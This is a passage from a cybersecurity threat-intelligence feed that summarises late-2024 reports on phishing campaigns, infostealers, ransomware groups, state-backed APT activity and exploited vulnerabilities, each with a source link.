Summary:: Recent intelligence indicates that the North Korean threat actor group, Jumpy Pisces, uses SliverC2 in their attacks, with specific IP addresses linked to both SliverC2 and the BianLian ransomware. Notably, these IPs have also been observed in connection with APT45 activities. Additionally, the Lazarus Group has been found to have ties to BianLian ransomware as of 2023. The evidence suggests that the ransomware group is leveraging SliverC2 as part of their operational toolkit.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_daily-huntsliver-c2-at-main-theravenfile-activity-7257635183527383041--0hN?utm_source=share&utm_medium=member_desktop

Intel Source:: CERT-UA

Intel Name:: Ukraine_CERT_Alerts_on_Tax_Phishing_Campaign

Date of Scan:: 2024-11-04

Impact:: LOW

Summary:: On October 28, 2024, CERT-UA researchers have identified a widespread phishing campaign involving emails that mimic requests from the State Tax Service. These emails contain PDF attachments leading to downloads of a malicious RAR file. The RAR file is password-protected and contains an executable disguised as a document. When opened, it displays a fake document while simultaneously installing the LITEMANAGER remote management tool, allowing unauthorized access to the victim's computer. This attack is financially motivated and attributed to the UAC-0050 group.

Source: https://cert.gov.ua/article/6281202

Intel Source:: Genians

Intel Name:: APT37_Threat_Actor

Date of Scan:: 2024-11-04

Impact:: MEDIUM

Summary:: Researchers from Genius have identifies a North Korean state-sponsored cyber espionage group that has been conducting espionage operations and cyberattacks against South Korean Entities. Their main focus is on individuals and organizations related to North Korean human rights, defector networks, journalists reporting on North Korea, and experts in national defense and foreign affairs. This group uses advanced tactics to gather critical details such as IP addresses, browser, and operating system data. This deploy RokRAT malware in their shortcut (lnk) files which can steal documents and phone recordings from compromised devices.

Source: https://www.genians.co.kr/blog/threat_intelligence/apt37_recon

Intel Source:: Securonix Threat Labs

Intel Name:: CRONTRAP_Campaign

Date of Scan:: 2024-11-04

Impact:: MEDIUM

Summary:: Securonix researchers have discovered a CRON#TRAP campaign which starts with a phishing email that tricks victim into downloading a malicious shortcut (.lnk) file. This file creates a hidden Linux environment on the victim’s machine using QEMU, a legitimate virtual machine tool. Once Linux environment is set up, a tool called Chisel is preconfigured that automatically connects to a C2 server controlled by the attackers. The attackers modify system startup scripts and add SSH keys to maintain the access even if the victim restarts their computer. Additionally, they create custom commands that allow them to interact directly with the main system within the environment which helps them to move across networks or data exfiltration.

Source: https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/

Intel Source:: silence-is-best

Intel Name:: October_Malspam_Campaigns

Date of Scan:: 2024-11-04

Impact:: MEDIUM

Summary:: Aggregation of October malspam campaign details shared by researcher silence-is-best

Source: https://gist.github.com/silence-is-best/2688f9486b0447bc128949289d27bfae

Intel Source:: Zscaler

Intel Name:: Contagious_Interview_and_WageMole_Campaigns

Date of Scan:: 2024-11-04

Impact:: MEDIUM

Summary:: Zscaler researchers have uncovered two campaigns named Contagious Interview and WageMole operated by North Korean threat actors seeking remote jobs in Western countries. The Contagious Interview campaign focuses on stealing personal and financial data, while WageMole uses this stolen information to secure remote employment through social engineering. The attackers often begin with posting fake job on LinkedIn to target various sectors such as information technology, healthcare, retail, financial services etc. They use scripts like BeaverTail (JavaScript) and InvisibleFerret (Python) to execute their attacks and steal sensitive information such as source code, cryptocurrency data, and personal information from victims. Additionally, they create fake identities using stolen data like fake passports and driver's licenses. They target both Windows and macOS systems.

Source: https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west

Intel Source:: Satori

Intel Name:: Phish_N_Ships

Date of Scan:: 2024-11-02

Impact:: MEDIUM

Summary:: The Satori Threat Intelligence team recently exposed and disrupted a sophisticated online fraud scheme, named "Phish ’n’ Ships," which used fake e-commerce websites to trick consumers into purchasing popular but hard-to-find items. The scheme involved infecting legitimate websites to create fake product listings, which were optimized to rank high in search results and lure consumers to fake online stores. Once there, consumers were prompted to enter credit card details via seemingly legitimate payment processors, only to find that no product would ever be delivered. Phish ’n’ Ships, operational since 2019, infected over 1,000 websites and established 121 fraudulent stores, leading to millions of dollars in consumer losses.

Source: https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-phish-n-ships-fakes-online-shops-to-steal-money-and-credit-card-information

Intel Source:: Rapid7

Intel Name:: SharePoint_Compromise_Investigation

Date of Scan:: 2024-11-02

Impact:: MEDIUM

Summary:: In October 2024, Rapid7's Incident Response team investigated a significant security breach involving a Microsoft Exchange service account with domain administrator privileges, leading to unauthorized access across the network and a total domain compromise that remained undetected for two weeks. The initial access vector was traced to the exploitation of CVE-2024-38094, a vulnerability in an on-premise SharePoint server, which allowed the attacker to deploy a webshell and execute various malicious tools. Key tactics included the installation of unauthorized software, notably the Horoung Antivirus, to disable existing security measures, and lateral movement facilitated by tools like Mimikatz and Fast Reverse Proxy (FRP) for credential gathering and maintaining persistence.

Source: https://www.rapid7.com/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/

Intel Source:: EclecticIQ

Intel Name:: LUNARSPIDER_Ransomware_Attacks

Date of Scan:: 2024-11-02

Impact:: MEDIUM

Summary:: EclecticIQ analysts uncovered a malvertising campaign linked to the Russian-speaking threat actor group LUNAR SPIDER, which is leveraging an obfuscated JavaScript downloader named Latrodectus to distribute Brute Ratel C4 malware, specifically targeting the financial sector. This campaign illustrates LUNAR SPIDER's adaptability following law enforcement actions that previously disrupted their operations, demonstrating their ability to shift from IcedID malware to more sophisticated tools. Analysts have identified LUNAR SPIDER's role as an initial access broker within a broader cybercrime ecosystem, collaborating with other ransomware groups like ALPHV (BlackCat) and WIZARD SPIDER to enhance their operational efficiency.

Source: https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus

Intel Source:: Cyble

Intel Name:: Strela_Stealer

Date of Scan:: 2024-11-01

Impact:: LOW

Summary:: Cyble researchers have discovered phishing campaign where attackers use fake invoice notifications to lure users into opening malicious emails. This campaign primarily targets Central and Southwestern Europe, especially Germany and Spain. carries a ZIP archive that includes JavaScript files containing a PowerShell command, which downloads and runs malware directly from a WebDAV server without leaving traces on the machine. Once the malware downloaded, it activates the Strela Stealer that steals sensitive email data such as such as server configurations, usernames, passwords, and system details. This gives attackers both credential access and potential entry points for further attacks.

Source: https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/

Intel Source:: Bitdefender

Intel Name:: Unmasking_SYS01_Infostealer

Date of Scan:: 2024-11-01

Impact:: MEDIUM

Summary:: Researchers from Bitdefender Labs identified a malvertising campaign in which cybercriminals are leveraging Meta’s advertising platform to spread SYS01 Infostealer malware which steals personal data. The malware is delivered through an ElectronJs application where cybercriminals are impersonating well-known brands and software like CapCut, Office 365, and Netflix to lure users into downloading it. They mainly target males aged 45 and above across regions such as the EU, North America, Australia, and Asia. The campaign utilizes nearly a hundred malicious domains for both distributing the malware and managing the attacks in real-time.

Source: https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/

Intel Source:: Cofense

Intel Name:: PythonRatLoader

Date of Scan:: 2024-11-01

Impact:: MEDIUM

Summary:: Researchers from Cofense have uncovered phishing campaign that distributes multiple malwares such as VenomRAT, XWorm, AsyncRAT, and DCRat. This attack leverages multiple layers of obfuscation and evasion techniques to distribute these malwares. The attack starts with an email that uses urgent language to trick the victim into clicking a malicious attachment, initiating a series of malicious activities that download an internet shortcut file to the victim's machine. This file redirects the user to a remote server via WebDAV protocol which allows access to files on that server.

Source: https://cofense.com/blog/pythonratloader-the-proprietor-of-xworm-and-friends

Intel Source:: NCSC

Intel Name:: Pygmy_Goat_Backdoor

Date of Scan:: 2024-11-01

Impact:: MEDIUM

Summary:: The UK’s National Cyber Security Centre (NCSC) has revealed the existence of a sophisticated backdoor, named Pygmy Goat, found on compromised Sophos XG firewall devices, indicating that the malware is also designed to target various Linux-based network devices. Pygmy Goat employs stealth techniques to disguise malicious activity as legitimate traffic, including the use of encrypted ICMP packets for covert communication. This malware, which appears to have originated with Fortinet devices, highlights the sophistication of the attackers, as it features multiple communication methods and remote shell capabilities. The revelation follows Sophos's admission of facing ongoing targeted attacks from Chinese government-backed hackers, which included sophisticated exploits and the deployment of custom implants for monitoring.

Source: https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf

Intel Source:: Sophos

Intel Name:: Pacific_Rim_Timeline

Date of Scan:: 2024-10-31

Impact:: MEDIUM

Summary:: Sophos' latest report details the counter-offensive strategies employed to combat China-based cyber threats, highlighting the sophisticated tactics used by attackers for surveillance, sabotage, and espionage. The report identifies novel exploits and customized malware, revealing similarities in tactics, tools, and procedures with prominent Chinese nation-state groups such as Volt Typhoon, APT31, and APT41. The targeted entities include critical infrastructure and government facilities across South and Southeast Asia, encompassing sensitive sites like nuclear energy suppliers, airports, military hospitals, and government ministries, emphasizing the ongoing risk posed by these sophisticated adversaries.

Source: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/

Intel Source:: Phylum

Intel Name:: Typosquat_Campaign_Targeting_Puppeteer_Users

Date of Scan:: 2024-10-31

Impact:: LOW

Summary:: The Phylum Research Team uncovered an ongoing typosquatting campaign targeting developers of the popular Puppeteer library and other packages. The attacker initially published a test package, which contained a post-install hook meant to execute a malicious JavaScript file, though it was missing from the package. Subsequent packages included obfuscated code that fetched and executed binaries from a dynamically obtained IP address via an Ethereum smart contract. This strategy allows the attacker to evade detection while collecting system information from infected machines. Following the initial releases, over 100 additional typosquatted packages emerged, highlighting a concerted effort to exploit developer trust in open-source software.

Source: https://blog.phylum.io/supply-chain-security-typosquat-campaign-targeting-puppeteer-users/

Intel Source:: Netcraft

Intel Name:: Xiu_Gou_Phishing_Kit

Date of Scan:: 2024-10-31

Impact:: MEDIUM

Summary:: Netcraft's research has unveiled the Xiū Gǒu phishing kit, actively used since September 2024 to launch campaigns targeting victims in the US, UK, Spain, Australia, and Japan. This kit has been linked to over 2,000 phishing websites impersonating various brands, including government and banking services, often utilizing engaging features like a branded mascot to enhance user experience. The kit employs a modern tech stack, including Vue.js and Golang, and incorporates Telegram bots for credential exfiltration, making detection challenging.

Source: https://www.netcraft.com/blog/doggo-threat-actor-analysis/

Intel Source:: FBI

Intel Name:: New_Tradecraft_of_Emennet_Pasargad

Date of Scan:: 2024-10-31

Impact:: MEDIUM

Summary:: The FBI and U.S. Department of Treasury have issued a Cybersecurity Advisory to alert network defenders about the Iranian cyber group Emennet Pasargad, operating under the name Aria Sepehr Ayandehsazan (ASA). This group, also known by various private sector names, has adopted new cyber tradecraft to conduct information operations through mid-2024, notably during the 2024 Summer Olympics, including a breach of a French dynamic display provider. ASA has also focused on harvesting content from IP cameras and leveraging online AI resources. Since 2023, the group has utilized fictitious hosting resellers to establish operational infrastructure, with recent reports indicating an interest in targeting election-related websites and media outlets for potential influence operations.

Source: https://www.ic3.gov/CSA/2024/241030.pdf

Intel Source:: Cisco Talos

Intel Name:: LummaStealerUpdate

Date of Scan:: 2024-10-31

Impact:: MEDIUM

Summary:: Cisco Talos has reported a phishing campaign targeting Facebook business and advertising account users in Taiwan, where an unknown threat actor uses copyright infringement as a lure to distribute information-stealing malware. The attackers employ decoy emails that mimic legal notifications from companies, encouraging recipients to download malicious files disguised as PDFs. Utilizing Google’s Appspot.com and Dropbox for delivery, the malware evades detection through techniques such as code obfuscation and resource manipulation. Notably, the campaign features two types of information stealers, LummaC2 and Rhadamanthys, both capable of extracting sensitive data while implementing sophisticated evasion strategies to avoid antivirus detection and ensure persistence on infected systems.

Source: https://blog.talosintelligence.com/threat-actors-use-copyright-infringement-phishing-lure-to-deploy-infostealers/

Intel Source:: Proofpoint

Intel Name:: Cryptocurrency_Scammers_Target_Job_Seekers

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: Proofpoint researchers have observed that the scammers those are known for Pig Butchering cryptocurrency fraud now shifting into fake job scams to target a wider audience. Pig Butchering schemes take long time to lure victim to investment into fake cryptocurrency to make big profits but now scammers are targeting financially insecure individuals with smaller payouts. The scam often starts through social media, SMS and messaging app with fake recruiters offering work-from-home jobs by luring victims with easy task such as reviewing products, boosting music streams, or writing hotel reviews. Once the victim registers on a fake website and shares a screenshot, they are assigned tasks. However, the ultimate goal is to convince the victim to invest money into the fraudulent platform.

Source: https://www.proofpoint.com/us/blog/threat-insight/pig-butchers-join-gig-economy-cryptocurrency-scammers-target-job-seekers

Intel Source:: Palo Alto

Intel Name:: Jumpy_Pisces_Engages_in_Play_Ransomware

Date of Scan:: 2024-10-30

Impact:: MEDIUM

Summary:: Palo Alto researchers have uncovered a North Korean state-sponsored threat group that belongs to Reconnaissance General Bureau of the Korean People’s Army called Jumpy Pisces. Jumpy Pisces, also known as Andariel and PLUTONIUM primarily focuses on cyberespionage, financial theft, and ransomware attacks which includes custom-develop ransomware like Maui. It is believed that the group is shifting its tactic by collaborating with Play ransomware group as an initial access broker (IAB) or an affiliate of the Play ransomware group. The attackers use several tools such as Sliver framework for C2, DTrack for data theft, and Mimikatz to steal credentials. They also deploy malware to collect browser history and credit card data.

Source: https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/

Intel Source:: Trend Micro

Intel Name:: Exploitation_of_CVE_2023_22527_for_Cryptomining

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered that attackers are using the Atlassian Confluence vulnerability CVE-2023-22527 to enable remote code execution for cryptomining on the Titan Network. Attackers exploited public IP lookup services and system commands to acquire information about the compromised devices. They used numerous shell scripts to install Titan binaries and connect the workstations to the Cassini Testnet, where they participated in the delegated proof of stake system to collect reward tokens.

Source: https://www.trendmicro.com/en_us/research/24/j/titan-network.html

Intel Source:: Silent Push

Intel Name:: Investment_Scams_and_Phishing_via_FUNNULL_CDN

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: Researchers from Silent Push have discovered the "Triad Nexus," a malicious domain cluster on the FUNNULL CDN that hosts scams, bogus trading apps, and gambling sites associated with the Lazarus Group. With over 200,000 DGA-enabled hostnames, FUNNULL enables phishing attacks and a polyfill.io supply chain attack that affects over 110,000 websites.

Source: https://www.silentpush.com/blog/triad-nexus-funnull/

Intel Source:: Cisco Talos

Intel Name:: BugSleep_RAT

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: Researchers from Cisco Talso have discovered the Remote Access Tool (RAT) named MuddyRot aka Bugsleep. This tool provides attackers with remote access by establishing a C2 connection. It uses various methods to communicate over TCP, enabling attackers to run commands, transfer files, and maintain access. BugSleep hides its activities by encrypting messages and using obfuscation to evade detection. When it connects to a server, it sends a message that contains the device’s name and username. The server can respond with commands like Ping to confirm the connection or initiate a reverse shell which allow attackers to run commands remotely.

Source: https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/

Intel Source:: Checkmarx

Intel Name:: CryptoAITools_Malware_Campaign

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: Researchers from Checkmarx have discovered a malware campaign that targeting cryptocurrency users by pretending to offer trading tools. The attacker uses various method to spread the malware that include a fake Python package called "cryptoaitools" on the PyPI repository and deceptive GitHub repositories. This malware disguised itself as a legitimate trading bot and target both Windows and macOS devices. Its main goal is to steal sensitive information such as cryptocurrency wallet data, browser credentials, and other important system files.

Source: https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vector-supply-chain-attack/

Intel Source:: Securonix Threat Labs

Intel Name:: New_FortiJump_Vulnerability_Exposed

Date of Scan:: 2024-10-30

Impact:: MEDIUM

Summary:: A critical vulnerability, CVE-2024-47575, known as FortiJump, was identified in FortiManager, allowing remote, unauthenticated attackers to execute arbitrary commands due to a missing authentication check in the FGFM communication protocol. Discovered by UNC5820 through a collaboration between Fortinet and Mandiant, the vulnerability has been exploited since June 27, 2024. After notifying affected customers, Fortinet released a patch on October 23, 2024. The flaw poses significant risks as it enables attackers to access sensitive configuration files and potentially compromise connected FortiGate devices, facilitating further lateral movement within the network. The vulnerability carries a CVSS score of 9.8, marking it as critical.

Source: https://www.securonix.com/blog/details-and-guidance-on-new-fortijump-vulnerability-or-cve-2024-47575/

Intel Source:: Palo Alto

Intel Name:: Malicious_Campaign_Targets_Cybersecurity_Vendors

Date of Scan:: 2024-10-30

Impact:: LOW

Summary:: A malicious campaign has been identified that impersonates cybersecurity vendors and VPN providers, with root domains registered between June 26 and October 8, 2024. Over the past month, these domains have been hosted on seven unique IP addresses, though many currently display "503 Service Unavailable" or "Internal Server Error" messages. Notably, some of the hosting infrastructure overlaps with that of the group Scattered Spider.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-28-IOCs-for-phising-campaign.txt

Intel Source:: The DFIR Report

Intel Name:: Inside_the_You_Dun_Threat_Group_Open_Directory

Date of Scan:: 2024-10-29

Impact:: MEDIUM

Summary:: The DFIR Report researchers have discovered an open directory linked to the Chinese-speaking hacking group You Dun. The group engaged in reconnaissance and web exploitation, utilizing tools like WebLogicScan, Vulmap, Xray, and SQLmap to identify and exploit vulnerable servers, particularly those running Zhiyuan OA software. They successfully executed SQL injection attacks and employed tools for privilege escalation, including Traitor for Linux and CDK for Docker and Kubernetes.

Source: https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-dun-threat-group/

Intel Source:: Securelist

Intel Name:: Malicious_CAPTCHAs_Spread_Lumma_and_Amadey

Date of Scan:: 2024-10-29

Impact:: LOW

Summary:: Researchers from Securelist have discovered that attackers are using fake CAPTCHAs to spread the Lumma stealer and Amadey Trojan. Initially aimed at gamers, this strategy has spread to other sites, including adult and file-sharing websites, reaching a larger audience. The malicious CAPTCHA is inserted in ad networks, directing users to malware while masquerading as a human verification tool.

Source: https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/

Intel Source:: Hunt.IO

Intel Name:: Rekoobe_Backdoor

Date of Scan:: 2024-10-29

Impact:: LOW

Summary:: Researchers from Hunt.IO have identified a malware called Rekoobe backdoor which was earlier used by APT 31 also known as Zirconium cyber espionage and data theft. This malware is based on Tiny Shell, an open-source tool that evolve with stronger encryption customized C2 setups to avoid detection. Researcher also identified this malware is hosted on an IP associated with several suspicious domains mimicking TradingView, a popular financial platform. The attackers are trying to infiltrate or manipulate the platform's user community.

Source: https://hunt.io/blog/rekoobe-backdoor-discovered-in-open-directory-possibly-targeting-tradingview-users

Intel Source:: Microsoft

Intel Name:: Spear_Phishing_Campaign_by_Midnight_Blizzard

Date of Scan:: 2024-10-29

Impact:: MEDIUM

Summary:: Microsoft Researcher have discovered a phishing campaign by the Russian threat actor known as Midnight Blizzard as known as APT29, Cozy bear, and Nobelium. This campaign primarily focuses on individuals in government, academia, defense, and non-governmental organizations in various countries such as United Kingdom, Europe, Australia, and Japan to collect the intelligence. The phishing emails contain a malicious Remote Desktop Protocol (RDP) configuration file with a Let’s Encrypt certificate to to make the emails appear more legitimate. Once user click on RDP files it establishes a connection to a server controlled by the attackers and expose sensitive information such as Files, directories, network drives, smart cards, printers, and microphones.

Source: https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/

Intel Source:: Outpost24

Intel Name:: Crystal_Rans0m

Date of Scan:: 2024-10-29

Impact:: MEDIUM

Summary:: Outpost24 researchers have uncovered a new ransomware named Crystal Rans0m that first appeared in 2023. The ransomware is written in Rust programming language and operates not only to encrypt files and demand ransom but also to steal sensitive information from the compromised systems. This approach is known as Stealer-as-a-Ransomware. This combined tactic where both data theft and encryption happen in the same malware can maximize the attack's impact. The ransomware group is financially motivated and targets victims without focusing on specific countries or industries. The most affected countries are Italy and Russia followed by the U.S, the U.K, Ukraine, and China.

Source: https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/

Intel Source:: Threat Stop

Intel Name:: Spike_in_Expiro_Malware_Infections_from_Zimbabwe

Date of Scan:: 2024-10-29

Impact:: LOW

Summary:: Expiro malware is a persistent file infector affecting Windows systems for over a decade, and has seen a significant increase in infections, particularly from Zimbabwe, with a 20% rise in detected requests since October 25th. This sophisticated malware embeds itself into both 32-bit and 64-bit executable files, making detection and removal difficult. The challenge lies in the potential loss of critical system components when attempting to delete infected files, complicating the cleanup process.

Source: https://www.threatstop.com/blog/expiro-malware-a-decade-old-threat-resurfaces-with-a-vengeance

Intel Source:: ESET

Intel Name:: CloudScout

Date of Scan:: 2024-10-28

Impact:: MEDIUM

Summary:: CloudScout is an advanced post-compromise toolset used by the China-aligned APT group Evasive Panda to target Taiwanese government and religious organizations from 2022 to 2023. By exploiting stolen web session cookies, CloudScout integrates with Evasive Panda's MgBot malware framework, allowing attackers to exfiltrate sensitive data from cloud services like Google Drive, Gmail, and Outlook. The toolset is modular, featuring at least ten known components, each specifically designed for accessing data from targeted platforms.

Source: https://www.welivesecurity.com/en/eset-research/cloudscout-evasive-panda-scouting-cloud-services/

Intel Source:: CERT-UA

Intel Name:: UAC_0001_Targets_Ukraine_Government_Entities

Date of Scan:: 2024-10-28

Impact:: LOW

Summary:: Researcher from CERT-UA have identified a campaign targeting government entities of Ukraine through phishing emails with subject line Table replacement. These emails contain a fake Google Docs link that tricks user into clicking a reCAPTCHA box. Once the user clicks on the box, a PowerShell command is copied to the clipboard of the user machine along with the instructions to press Win+R and Ctrl+V to execute it. This command downloads malicious files that include a PowerShell script and an HTA file to steal login credentials from browsers (like Chrome, Firefox, and Edge) to set up an SSH tunnel and run Metasploit tool.

Source: https://cert.gov.ua/article/6281123

Intel Source:: ReliaQuest

Intel Name:: Evolving_Social_Engineering_by_Black_Basta

Date of Scan:: 2024-10-28

Impact:: LOW

Summary:: Researchers from ReliaQuest have observed Black Basta's growing social engineering efforts, which included using Teams messages and QR codes to acquire access and spread ransomware. The attackers overwhelm customers with spam and act as support desks to deceive them into downloading harmful software.

Source: https://www.reliaquest.com/blog/black-basta-social-engineering-technique-microsoft-teams/

Intel Source:: Aqua Sec

Intel Name:: TeamTNT_Targets_Cloud_Environments

Date of Scan:: 2024-10-28

Impact:: LOW

Summary:: Aqua Nautilus researchers have uncovered a new campaign by the notorious hacking group TeamTNT, which is targeting cloud-native environments by exploiting exposed Docker daemons. The group aims to deploy Sliver malware, cyber worms, and cryptominers through compromised servers and Docker Hub. By appending infected Docker instances to Docker Swarm, they can utilize cloud capabilities and rent out victims computational power for cryptomining, profiting without direct management. This campaign marks a return to TeamTNT's roots, featuring a shift from their traditional Tsunami backdoor to the more stealthy Sliver malware.

Source: https://www.aquasec.com/blog/threat-alert-teamtnts-docker-gatling-gun-campaign/

Intel Source:: Mandiant

Intel Name:: UNC5812_Targets_Ukrainian_Military_Recruits

Date of Scan:: 2024-10-28

Impact:: MEDIUM

Summary:: Google/Mandiant researchers have uncovered a campaign by a Russian-linked group called UNC5812 that combines espionage, malware delivery, and influence campaigns. This group operates through a Telegram channel Civil Defense which offers software to track Ukrainians military recruiters. However, if users install this software with security protections turned off, it secretly delivers malware along with a decoy map called SUNSPINNER. UNC5812 spreads this malware through its Telegram channel (@civildefense_com_ua) and website (civildefense[.]com.ua). It installs a downloader called Pronsis Loader that targets window users and initiates a complex infection chain to deliver information-stealing malware called PURESTEALER.

Source: https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/

Intel Source:: Elastic Labs

Intel Name:: MaaS_Infostealers_Adapt

Date of Scan:: 2024-10-28

Impact:: LOW

Summary:: Elastic Labs researchers have observed that google introduced a new feature called Application-Bound Encryption (ABE) in Chrome for Windows to protect cookies and other browser data. These cookies often store authentication tokens that allow users to stay logged in to websites. ABE encrypts cookie data and allows only decryption through the legitimate Chrome process. However, cybercriminals have updated their infostealers such as STEALC, VIDAR, LUMMA, METASTEALER, PHEMEDRONE, and XENOSTEALER with new techniques to bypass this protection. This technique involves using a hacking tool called ChromeKatz to exploit Windows COM services to unlock encrypted data in Chrome.

Source: https://www.elastic.co/security-labs/katz-and-mouse-game

Intel Source:: Splunk

Intel Name:: ValleyRAT_Insights

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: Splunk researchers have identified a malware known as Valley RAT that first appeared in 2023 and targets Chinese-speaking users through phishing attacks. It allows attackers to take control of the victim's machine remotely to monitor their activity and deploy additional malicious software. ValleyRAT operates in several stages and loads each part step-by-step. This approach helps to stay hidden and continue operating on the compromised system during the attack.

Source: https://www.splunk.com/en_us/blog/security/valleyrat-insights-tactics-techniques-and-detection-methods.html

Intel Source:: ISC.SANS

Intel Name:: Emerging_Threats_Targeting_Shell_Scripts

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: Researchers at SANS have highlighted several URLs with the .sh extension, indicating they are likely shell scripts. These scripts appear to be related to configuring environment variables and credentials, which are commonly used in web applications despite being less secure than other methods like secret managers. This approach is favored for its convenience and portability across development and production environments. Notably, attackers seem to be diversifying their tactics beyond traditional scans for files like ".env" to target these scripts, such as develop.sh and /docker/startups.sh, which are often used to configure and launch Docker containers.

Source: https://isc.sans.edu/diary/Everybody+Loves+Bash+Scripts+Including+Attackers/31376/

Intel Source:: Datadog Security Labs

Intel Name:: DPRK_Attackers_Target_Developers_via_npm

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: Researchers from DATADOG security labs have observed the three malicious npm packages—passports-js, bcrypts-js, and blockscan-api associated with the DPRK threat actor "Tenacious Pungsan" in September 2024. These 323 downloads included BeaverTail malware, a JavaScript infostealer associated with the Contagious Interview campaign.

Source: https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/

Intel Source:: Cyble

Intel Name:: HeptaX_Cyberespionage_Operations

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: CRIL researchers have uncovered a phishing campaign called HeptaX which starts with ZIP file containing a malicious LNK file. When user click on LNK file, it triggers a PowerShell command that downloads malicious scripts and BAT files from a remote server. These scripts create a new admin account and change Remote Desktop Protocol (RDP) settings that allow attackers to access the system remotely. Additionally, the attackers deploy ChromePass to steal saved passwords from browsers like Chrome, increasing the risk of further account compromise. This group has been operating since 2023 and appears to target the healthcare sector based on the file.

Source: https://cyble.com/blog/heptax-unauthorized-rdp-connections-for-cyberespionage-operations/

Intel Source:: CERT-AGID

Intel Name:: XWorm_Spread_in_Italy_via_Fake_Namirial_Invoice

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: Researchers at CERT-AGID have uncovered a phishing campaign in which attackers are spreading the XWorm RAT through fake emails disguised as official communications from the Namirial operator. The emails are written in Italian that encourage recipients to open a PDF attachment or click a link inside the message. The link downloads a ZIP file from Dropbox containing a URL file which uses TryCloudflare to create temporary tunnels that connect to attacker’s hidden servers. The attack continues with another ZIP file download which includes a Python interpreter and malicious scripts. These scripts activate malware that gives the attackers control over the victim's machine.

Source: https://cert-agid.gov.it/news/xworm-diffuso-in-italia-tramite-falsa-fattura-namirial/

Intel Source:: CERT-UA

Intel Name:: Ukraine_CERT_Warns_of_New_Phishing_Campaign

Date of Scan:: 2024-10-25

Impact:: LOW

Summary:: https://cert.gov.ua/article/6281095

Source: https://cert.gov.ua/article/6281095

Intel Source:: Securelist

Intel Name:: Lazarus_APT_Targeting_Cryptocurrency

Date of Scan:: 2024-10-24

Impact:: LOW

Summary:: Researchers from Securelist have discovered that Lazarus is still a very active APT group targeting cryptocurrency, employing advanced tactics such as generative AI and zero-day flaws. Vulnerabilities in Google Chrome's JIT compilers are also revealed, however the new V8 sandbox could mitigate future concerns.

Source: https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/

Intel Source:: Trend Micro

Intel Name:: Web_Shell_and_VPN_Threats

Date of Scan:: 2024-10-24

Impact:: LOW

Summary:: TrendMicro researchers have identified that attackers are increasingly employing a layered fallback strategy that utilizes multiple tools, such as web shells, tunneling software, and remote access applications to maintain access to compromised systems, even if one entry point is blocked. Web shells provide interactive access, allowing for quick adaptation of tactics. By compromising VPN accounts, attackers can blend into the network, disguising malicious activities as legitimate processes.

Source: https://www.trendmicro.com/en_us/research/24/j/understanding-the-initial-stages-of-web-shell-and-vpn-threats-an.html

Intel Source:: SEQRITE Labs

Intel Name:: Operation_Cobalt_Whisper

Date of Scan:: 2024-10-24

Impact:: LOW

Summary:: Researchers from SEQRITE Labs have uncovered a cyber espionage campaign tracked as Operation Cobalt Whisper targeting the defence sector in Pakistan and researchers, engineers, and professors in Hong Kong. The attackers use decoy documents related to electrotechnical societies and awards to trick victims into executing malicious payloads. They deploy the Cobalt Strike tool via VBScript and LNK shortcuts hidden in RAR archives to infiltrate systems and steal sensitive data by connecting to their C2 servers. The primary focus of this campaign is to steal intellectual property and critical research from these industries.

Source: https://www.seqrite.com/blog/operation-cobalt-whisper-targets-industries-hong-kong-pakistan/

Intel Source:: FortiGuard Labs

Intel Name:: Critical_FortiManager_Vulnerability_Disclosed

Date of Scan:: 2024-10-24

Impact:: MEDIUM

Summary:: FortiGuard Labs researchers have disclosed a critical vulnerability in FortiManager, tracked as CVE-2024-47575, which has been exploited in zero-day attacks. The vulnerability arises from a missing authentication issue in the fgfmd daemon, allowing remote unauthenticated attackers to execute arbitrary code via specially crafted requests. This affects specific older FortiAnalyzer models (1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E) that have FortiManager enabled and at least one interface with the fgfm service active. The attacks can potentially steal sensitive configuration files, IP addresses, and credentials for managed devices.

Source: https://www.fortiguard.com/psirt/FG-IR-24-423

Intel Source:: Cisco Talos

Intel Name:: TA866_Threat_Actor

Date of Scan:: 2024-10-23

Impact:: MEDIUM

